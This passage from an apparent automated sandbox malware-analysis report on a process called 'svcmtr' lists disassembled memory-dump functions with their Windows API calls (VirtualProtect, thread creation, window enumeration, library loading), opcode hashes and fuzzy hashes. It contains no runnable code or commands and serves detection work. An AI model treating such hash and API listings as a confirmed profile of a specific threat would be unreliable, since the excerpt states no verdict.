                                                                                                                            • Source File: 00000002.00000002.875390501.0000000000230000.00000040.00001000.00020000.00000000.sdmp, Offset: 00230000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_230000_svcmtr.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Thread$CreateExitUser
                                                                                                                            • String ID: p
                                                                                                                            • API String ID: 4108186749-2181537457
                                                                                                                            • Opcode ID: 4be6e374e4bff62eccc82c3c4f0442d863825646c38bb8042f3670b1aab00b6c
                                                                                                                            • Instruction ID: 8f4d7a4349490d568e7788745f75adf1e12b3fc16a7331c88b43dc1f1468f618
                                                                                                                            • Opcode Fuzzy Hash: 4be6e374e4bff62eccc82c3c4f0442d863825646c38bb8042f3670b1aab00b6c
                                                                                                                            • Instruction Fuzzy Hash: A541BBF6A34722DBFB1C52A4CD52BBC7512EBE0710F28A129A347E9187CDFC08689910
                                                                                                                            Function 00231FF0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 169COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.875390501.0000000000230000.00000040.00001000.00020000.00000000.sdmp, Offset: 00230000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_230000_svcmtr.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Thread$CreateExitUser
                                                                                                                            • String ID: p
                                                                                                                            • API String ID: 4108186749-2181537457
                                                                                                                            • Opcode ID: 01dd390c73c3bde259d133b3f7a808c51f21b1a22f27b22b1612d1d06215faaf
                                                                                                                            • Instruction ID: 0b4190ccbcce281528b9bc89d4e12da00fd5e6d0c7e0322eb624933a90064536
                                                                                                                            • Opcode Fuzzy Hash: 01dd390c73c3bde259d133b3f7a808c51f21b1a22f27b22b1612d1d06215faaf
                                                                                                                            • Instruction Fuzzy Hash: 0741BCF6A34722DBFB1C52B4CD56BBC7512EBE0710F28A129A347A91C7CDFC08689910
                                                                                                                            Function 00231052 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 155libraryCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.875390501.0000000000230000.00000040.00001000.00020000.00000000.sdmp, Offset: 00230000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_230000_svcmtr.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: LibraryLoad
                                                                                                                            • String ID: j$l
                                                                                                                            • API String ID: 1029625771-267213617
                                                                                                                            • Opcode ID: d80d9dc7ffda5dca5966a78d390929dabf9720420496a113c08ff4b7d6eb3374
                                                                                                                            • Instruction ID: 0aa415c6dc973e58bc4be0e24904c5100e59f914efc106dd954bf3552af8c2e0
                                                                                                                            • Opcode Fuzzy Hash: d80d9dc7ffda5dca5966a78d390929dabf9720420496a113c08ff4b7d6eb3374
                                                                                                                            • Instruction Fuzzy Hash: 93416AF2E746528EEB0D9AA4CC953FDB665EB80301F28D53DCD43DA191CAF845B1DA10
                                                                                                                            Function 0023203D Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 149COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.875390501.0000000000230000.00000040.00001000.00020000.00000000.sdmp, Offset: 00230000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_230000_svcmtr.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Thread$CreateExitUser
                                                                                                                            • String ID: p
                                                                                                                            • API String ID: 4108186749-2181537457
                                                                                                                            • Opcode ID: 41788bd7fbca16d56cbdabdf3d951325aa2484f402744e1148dc19268bc07d1f
                                                                                                                            • Instruction ID: d845373e67de13163e7e82e80355799fadb208324ac8ef326377193e2081d8aa
                                                                                                                            • Opcode Fuzzy Hash: 41788bd7fbca16d56cbdabdf3d951325aa2484f402744e1148dc19268bc07d1f
                                                                                                                            • Instruction Fuzzy Hash: 3C4188F7A30622DBEB1C52A4CD66BBD2156EBE0710F2CE529A347E9187CDEC44688950
                                                                                                                            Function 0023107D Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 143libraryCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.875390501.0000000000230000.00000040.00001000.00020000.00000000.sdmp, Offset: 00230000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_230000_svcmtr.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: LibraryLoad
                                                                                                                            • String ID: j$l
                                                                                                                            • API String ID: 1029625771-267213617
                                                                                                                            • Opcode ID: 23c5c0ae02eb9a445498dce5c7033c986dd4260ba83f1d4e7b09b0f76b0120b9
                                                                                                                            • Instruction ID: 380b314e5c4780d77b2b149e7c0b9acd12a6ca11f41f049f5b15244b3d852b4a
                                                                                                                            • Opcode Fuzzy Hash: 23c5c0ae02eb9a445498dce5c7033c986dd4260ba83f1d4e7b09b0f76b0120b9
                                                                                                                            • Instruction Fuzzy Hash: 2D4178F2E746528EEB0D8AA4CC953FDB265EB80301F28D13DCE42DA191CAF845B1CA10
                                                                                                                            Function 00232053 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 142COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.875390501.0000000000230000.00000040.00001000.00020000.00000000.sdmp, Offset: 00230000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_230000_svcmtr.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Thread$CreateExitUser
                                                                                                                            • String ID: p
                                                                                                                            • API String ID: 4108186749-2181537457
                                                                                                                            • Opcode ID: 06b12bca111a1b2aaabbaa3ac75fee9f351a8b48f410928c161474f983d098aa
                                                                                                                            • Instruction ID: 67bb67562b674500cfca907ff77cd14050f081c31757ec8697a8e5df646a372a
                                                                                                                            • Opcode Fuzzy Hash: 06b12bca111a1b2aaabbaa3ac75fee9f351a8b48f410928c161474f983d098aa
                                                                                                                            • Instruction Fuzzy Hash: 6531ABFBA30622DBEB1C52A4CD66B7D2156EBE0700F2CE529A347EA187CDEC44588950
                                                                                                                            Function 00232061 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 137COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.875390501.0000000000230000.00000040.00001000.00020000.00000000.sdmp, Offset: 00230000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_230000_svcmtr.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Thread$CreateExitUser
                                                                                                                            • String ID: p
                                                                                                                            • API String ID: 4108186749-2181537457
                                                                                                                            • Opcode ID: 852d18017d3e2340b211304488258b738f7fbbae8db7b98aad9d11455063a82a
                                                                                                                            • Instruction ID: b060b7d97af34448fdcfbb02a0aba481e6064bb52160b25f362cdc455a75a771
                                                                                                                            • Opcode Fuzzy Hash: 852d18017d3e2340b211304488258b738f7fbbae8db7b98aad9d11455063a82a
                                                                                                                            • Instruction Fuzzy Hash: 59319AF7A30622EBEB1C12B4CD66B7D2156EBE0700F2CE539A34799187CDEC44588550
                                                                                                                            Function 0023172B Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 112memoryCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • VirtualProtect.KERNEL32(?,?,?,?), ref: 00231797
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.875390501.0000000000230000.00000040.00001000.00020000.00000000.sdmp, Offset: 00230000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_230000_svcmtr.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ProtectVirtual
                                                                                                                            • String ID: /$;
                                                                                                                            • API String ID: 544645111-2360594509
                                                                                                                            • Opcode ID: 7d96fabae2d3ccbe92d7649fcdb2c3e95c606fc3daaaab215139462d66ca8084
                                                                                                                            • Instruction ID: 19b285cd968693cebf0819353a2667da25d637f5b5412e9aead08009aefc683f
                                                                                                                            • Opcode Fuzzy Hash: 7d96fabae2d3ccbe92d7649fcdb2c3e95c606fc3daaaab215139462d66ca8084
                                                                                                                            • Instruction Fuzzy Hash: E9313CB3A301129BEB0C5BA8CD566BDF2A5E7D4711F2C952DE002EA186DF7C48749660
                                                                                                                            Function 00421AA0 Relevance: 4.5, APIs: 3, Instructions: 47sleepCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • GetTickCount.KERNEL32(?,?,?,?,004137A9,gpmus,00000005), ref: 00421AB0
                                                                                                                              • Part of subcall function 00425318: __getptd.LIBCMT ref: 0042531D
                                                                                                                            • _rand.LIBCMT ref: 00421AC0
                                                                                                                              • Part of subcall function 0042532A: __getptd.LIBCMT ref: 0042532A
                                                                                                                            • Sleep.KERNEL32(0000000F), ref: 00421AE7
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.875562858.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000002.00000002.875541434.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.875592110.0000000000431000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.875613471.0000000000439000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.875613471.00000000004BC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.875613471.00000000004C0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.875649125.00000000004D8000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_400000_svcmtr.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: __getptd$CountSleepTick_rand
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1716435427-0
                                                                                                                            • Opcode ID: cca24745bf26545fd5b3edd2adad2181406d73069cbbd90972e4226cb2fbf58d
                                                                                                                            • Instruction ID: 95d9c39fcb1a92f549b40d1566920909eef1f56e4dd4b590153865105a78ff57
                                                                                                                            • Opcode Fuzzy Hash: cca24745bf26545fd5b3edd2adad2181406d73069cbbd90972e4226cb2fbf58d
                                                                                                                            • Instruction Fuzzy Hash: 08F081727142146BE700AB6AF881A9E7399AFD43A4B44503AF909C7231D9759841439A
                                                                                                                            Function 002308CE Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 149COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • EnumWindows.USER32(0023089C,00000000), ref: 0023093A
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.875390501.0000000000230000.00000040.00001000.00020000.00000000.sdmp, Offset: 00230000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_230000_svcmtr.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: EnumWindows
                                                                                                                            • String ID: @
                                                                                                                            • API String ID: 1129996299-2766056989
                                                                                                                            • Opcode ID: 1ee9b173d1b23e43e8b3b53350e6c332c44dbac0dab3fc048332c86b37f47f0a
                                                                                                                            • Instruction ID: 1b7c84241fd48ef74c05f55190074d151be97d245686ca0e1415c584240d319f
                                                                                                                            • Opcode Fuzzy Hash: 1ee9b173d1b23e43e8b3b53350e6c332c44dbac0dab3fc048332c86b37f47f0a
                                                                                                                            • Instruction Fuzzy Hash: C6410DB6E30326CBDF19CAA8DCA53BE7671FBC4701F285539C202B5141CAB84954C6B1
                                                                                                                            Function 0023090D Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 98COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • EnumWindows.USER32(0023089C,00000000), ref: 0023093A
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.875390501.0000000000230000.00000040.00001000.00020000.00000000.sdmp, Offset: 00230000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_230000_svcmtr.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: EnumWindows
                                                                                                                            • String ID: @
                                                                                                                            • API String ID: 1129996299-2766056989
                                                                                                                            • Opcode ID: 24ffc371f46f0de56576e07489c72bc5483e5c5a794b096009c5791a276e725f
                                                                                                                            • Instruction ID: 8a0c3ee64a783c301f3f47d72b0aa315a830683b94504545abc2194323340fc3
                                                                                                                            • Opcode Fuzzy Hash: 24ffc371f46f0de56576e07489c72bc5483e5c5a794b096009c5791a276e725f
                                                                                                                            • Instruction Fuzzy Hash: 7E31A6B6E3132ACBDF19CEA8D9A82FEB6B1AF84701F284139C10676151CA741A54C6F1
                                                                                                                            Function 002308BD Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 92COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.875390501.0000000000230000.00000040.00001000.00020000.00000000.sdmp, Offset: 00230000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_230000_svcmtr.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: EnumWindows
                                                                                                                            • String ID: @
                                                                                                                            • API String ID: 1129996299-2766056989
                                                                                                                            • Opcode ID: adc6efd2b932aaf2297a478b2ed613ec12978a31318a0243e848804abda470ea
                                                                                                                            • Instruction ID: bb16c6857e75f82348d5f3b57d1654567e5b623e321c50aece2d4174b1cceb2e
                                                                                                                            • Opcode Fuzzy Hash: adc6efd2b932aaf2297a478b2ed613ec12978a31318a0243e848804abda470ea
                                                                                                                            • Instruction Fuzzy Hash: 3C31D6B5E3132ACBDF19CEA8D9A82FEB6B0BF84701F284139C10276151CA741E54C6F1
                                                                                                                            Function 00230938 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 86COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • EnumWindows.USER32(0023089C,00000000), ref: 0023093A
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.875390501.0000000000230000.00000040.00001000.00020000.00000000.sdmp, Offset: 00230000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_230000_svcmtr.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: EnumWindows
                                                                                                                            • String ID: @
                                                                                                                            • API String ID: 1129996299-2766056989
                                                                                                                            • Opcode ID: 2c3dd29b98de14fc247514b6294b694b0177f5b73a4d53a0db72cb699a8fa6af
                                                                                                                            • Instruction ID: 6543d6caf6550961a84fbda2a35b45b3cd706ca408fb04dfac6ca73bd9481c81
                                                                                                                            • Opcode Fuzzy Hash: 2c3dd29b98de14fc247514b6294b694b0177f5b73a4d53a0db72cb699a8fa6af
                                                                                                                            • Instruction Fuzzy Hash: D02173B5E3132ACBDF19CEA8D9982FEB6B1BB84701F294239C20576150CA741E54C6F1
                                                                                                                            Function 00414CD0 Relevance: 3.2, APIs: 2, Instructions: 166COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.875562858.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000002.00000002.875541434.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.875592110.0000000000431000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.875613471.0000000000439000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.875613471.00000000004BC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.875613471.00000000004C0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.875649125.00000000004D8000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_400000_svcmtr.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: _memset
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2102423945-0
                                                                                                                            • Opcode ID: 4dffdbea92ce661ec6c71f9f0e5703b0b4cddb7dd2a9a2379281bc5435b63fc0
                                                                                                                            • Instruction ID: 74fd737fc825ae388329666ed008e4d7fa41db048e3919a37a49896fcb432940
                                                                                                                            • Opcode Fuzzy Hash: 4dffdbea92ce661ec6c71f9f0e5703b0b4cddb7dd2a9a2379281bc5435b63fc0
                                                                                                                            • Instruction Fuzzy Hash: 1F51C3B7A002069BCB10EE69DC816ABB3A5ABC0754F08093AEC14D7341EB39ED5587E5
                                                                                                                            Function 00232091 Relevance: 3.1, APIs: 2, Instructions: 122COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.875390501.0000000000230000.00000040.00001000.00020000.00000000.sdmp, Offset: 00230000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_230000_svcmtr.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Thread$CreateExitUser
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 4108186749-0
                                                                                                                            • Opcode ID: 70c5366eae1cca11daaad09f54bd33c86a0f7575d6d7609fb2b2a5b750baffe8
                                                                                                                            • Instruction ID: 449e80f75d264111357b629d59a222e0fdd5b01d0af2e3d3ff73ebd82646f21e
                                                                                                                            • Opcode Fuzzy Hash: 70c5366eae1cca11daaad09f54bd33c86a0f7575d6d7609fb2b2a5b750baffe8
                                                                                                                            • Instruction Fuzzy Hash: 4A317BF7A30A22E6FB1C2274CE66B79544AE7E0700F6CE53DA387D8187CCED04685460
                                                                                                                            Function 002320B8 Relevance: 3.1, APIs: 2, Instructions: 106threadCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • CreateThread.KERNEL32(?,00000000,00000000,?,00000000,00000000), ref: 00232124
                                                                                                                              • Part of subcall function 0023216C: RtlExitUserThread.NTDLL(?,00000000,?,26417AC6), ref: 002321D8
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.875390501.0000000000230000.00000040.00001000.00020000.00000000.sdmp, Offset: 00230000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_230000_svcmtr.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Thread$CreateExitUser
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 4108186749-0
                                                                                                                            • Opcode ID: d74dc855914b7349c3b0d40e2db62c309a59be95aa08991b47927ae15319f3fb
                                                                                                                            • Instruction ID: 3a8c5a65054a8280fac4d3f6f9b6f398294be1e8b296e0f40aade806a97c2582
                                                                                                                            • Opcode Fuzzy Hash: d74dc855914b7349c3b0d40e2db62c309a59be95aa08991b47927ae15319f3fb
                                                                                                                            • Instruction Fuzzy Hash: 922145FB634A22D6EB1D22B4CE66B7D540AE7E0700F68E53DA387D8183CCDD00A85460
                                                                                                                            Function 002320F7 Relevance: 3.1, APIs: 2, Instructions: 86threadCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • CreateThread.KERNEL32(?,00000000,00000000,?,00000000,00000000), ref: 00232124
                                                                                                                              • Part of subcall function 0023216C: RtlExitUserThread.NTDLL(?,00000000,?,26417AC6), ref: 002321D8
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.875390501.0000000000230000.00000040.00001000.00020000.00000000.sdmp, Offset: 00230000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_230000_svcmtr.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Thread$CreateExitUser
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 4108186749-0
                                                                                                                            • Opcode ID: 9349f056b0b02ee25d4394e217fd01f95e6d08a6e456e14775c8b4b7317b2888
                                                                                                                            • Instruction ID: 5cad33ed6b63dc750dfdfab05c4a8ce8c9df5328595ae0ecb5382b7ab27dba0c
                                                                                                                            • Opcode Fuzzy Hash: 9349f056b0b02ee25d4394e217fd01f95e6d08a6e456e14775c8b4b7317b2888
                                                                                                                            • Instruction Fuzzy Hash: AC11CEF7A30A23D6EB1D23B8CE6A77D5406E7E0700F2CE53E978B88183CDD800A85460
                                                                                                                            Function 00232122 Relevance: 3.1, APIs: 2, Instructions: 74threadCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • CreateThread.KERNEL32(?,00000000,00000000,?,00000000,00000000), ref: 00232124
                                                                                                                              • Part of subcall function 0023216C: RtlExitUserThread.NTDLL(?,00000000,?,26417AC6), ref: 002321D8
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.875390501.0000000000230000.00000040.00001000.00020000.00000000.sdmp, Offset: 00230000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_230000_svcmtr.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Thread$CreateExitUser
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 4108186749-0
                                                                                                                            • Opcode ID: 6fa603f21a32fd82ace2bf48d055e2b0fa8e0f3ca1c3d1e55c02ee84f5a26be5
                                                                                                                            • Instruction ID: cd63bcd497d8fbff56450d58f769d65625f3a7f6b0fa1f7237168db7a85199c1
                                                                                                                            • Opcode Fuzzy Hash: 6fa603f21a32fd82ace2bf48d055e2b0fa8e0f3ca1c3d1e55c02ee84f5a26be5
                                                                                                                            • Instruction Fuzzy Hash: 2B116FF7634A23D6EF1D12B8CE65B7D5405E7E0700F68E539978B98197DCD8006C5460
                                                                                                                            Function 00424F0C Relevance: 3.0, APIs: 2, Instructions: 32COMMONLIBRARYCODE
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 0042570D: __getptd_noexit.LIBCMT ref: 0042570D
                                                                                                                            • __lock_file.LIBCMT ref: 00424F53
                                                                                                                              • Part of subcall function 004294CD: __lock.LIBCMT ref: 004294F2
                                                                                                                            • __fclose_nolock.LIBCMT ref: 00424F5E
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.875562858.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000002.00000002.875541434.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.875592110.0000000000431000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.875613471.0000000000439000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.875613471.00000000004BC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.875613471.00000000004C0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.875649125.00000000004D8000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_400000_svcmtr.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2800547568-0
                                                                                                                            • Opcode ID: 1f5f3315ae4fde1789aa69123799fedb966fbeaeb054d224ed147cfcf4029b6d
                                                                                                                            • Instruction ID: 2b14ba32f7767529598eddfeb2aa0d2d10d090eb1bd0b8a509b205913a1b2d68
                                                                                                                            • Opcode Fuzzy Hash: 1f5f3315ae4fde1789aa69123799fedb966fbeaeb054d224ed147cfcf4029b6d
                                                                                                                            • Instruction Fuzzy Hash: 47F0C270B007219ADB10AB75A90275E7BA0AF81338FA2834EE4349A1C1CB3C89018E5E
                                                                                                                            Function 0042CAC0 Relevance: 1.6, APIs: 1, Instructions: 52memoryCOMMONLIBRARYCODE
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,0042BB6C,?,?,00000000,00000000,00000000,?,00427528,00000001,00000214,?,00000000), ref: 0042CB03
                                                                                                                              • Part of subcall function 0042570D: __getptd_noexit.LIBCMT ref: 0042570D
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.875562858.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000002.00000002.875541434.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.875592110.0000000000431000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.875613471.0000000000439000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.875613471.00000000004BC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.875613471.00000000004C0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.875649125.00000000004D8000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_400000_svcmtr.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: AllocateHeap__getptd_noexit
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 328603210-0
                                                                                                                            • Opcode ID: c2fc6f5b9b056656b9c4664acd15865b97f354cd22a97a416b74d970205f40a3
                                                                                                                            • Instruction ID: 8e65df08a9423b0807d497d14f4799f3672e50ee20dc361ebe088a0b243ff951
                                                                                                                            • Opcode Fuzzy Hash: c2fc6f5b9b056656b9c4664acd15865b97f354cd22a97a416b74d970205f40a3
                                                                                                                            • Instruction Fuzzy Hash: 9201D8313012359BEB24DF25FC96B6F3794EB81360F44462BE915C7290DB79DC00C688
                                                                                                                            Function 0023216C Relevance: 1.5, APIs: 1, Instructions: 45threadCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • RtlExitUserThread.NTDLL(?,00000000,?,26417AC6), ref: 002321D8
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.875390501.0000000000230000.00000040.00001000.00020000.00000000.sdmp, Offset: 00230000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_230000_svcmtr.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ExitThreadUser
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3424019298-0
                                                                                                                            • Opcode ID: 49143707107687e7b35d10633917b1b6a73f6eaea7c8d102e89f15c667ebe446
                                                                                                                            • Instruction ID: ea65d67206252ffdc72c700f6e9c5b87d3427a3003d7c2919f3606fe563283de
                                                                                                                            • Opcode Fuzzy Hash: 49143707107687e7b35d10633917b1b6a73f6eaea7c8d102e89f15c667ebe446
                                                                                                                            • Instruction Fuzzy Hash: 81F0B8FB670A2295FB1C22A0DD76B78000AE3E4701F68E83E6283D8682DCDD80905020
                                                                                                                            Function 0023176A Relevance: 1.5, APIs: 1, Instructions: 44memoryCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • VirtualProtect.KERNEL32(?,?,?,?), ref: 00231797
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.875390501.0000000000230000.00000040.00001000.00020000.00000000.sdmp, Offset: 00230000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_230000_svcmtr.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ProtectVirtual
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 544645111-0
                                                                                                                            • Opcode ID: 7fdecd4c65e739fd43d314d6a2364bc55c7da5283aaa43a512b286945ce32d55
                                                                                                                            • Instruction ID: b25fa0194a4348a8930f8dcd6c84a6a012a76a0ef4f5cfec357320c3d2632542
                                                                                                                            • Opcode Fuzzy Hash: 7fdecd4c65e739fd43d314d6a2364bc55c7da5283aaa43a512b286945ce32d55
                                                                                                                            • Instruction Fuzzy Hash: FAF0BBB7B351128BEB1CAA98DD551FDF2A1A7E4712F3CA52ED003A8382EFA905705560
                                                                                                                            Function 002321AB Relevance: 1.5, APIs: 1, Instructions: 25threadCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • RtlExitUserThread.NTDLL(?,00000000,?,26417AC6), ref: 002321D8
                                                                                                                            Memory Dump Source
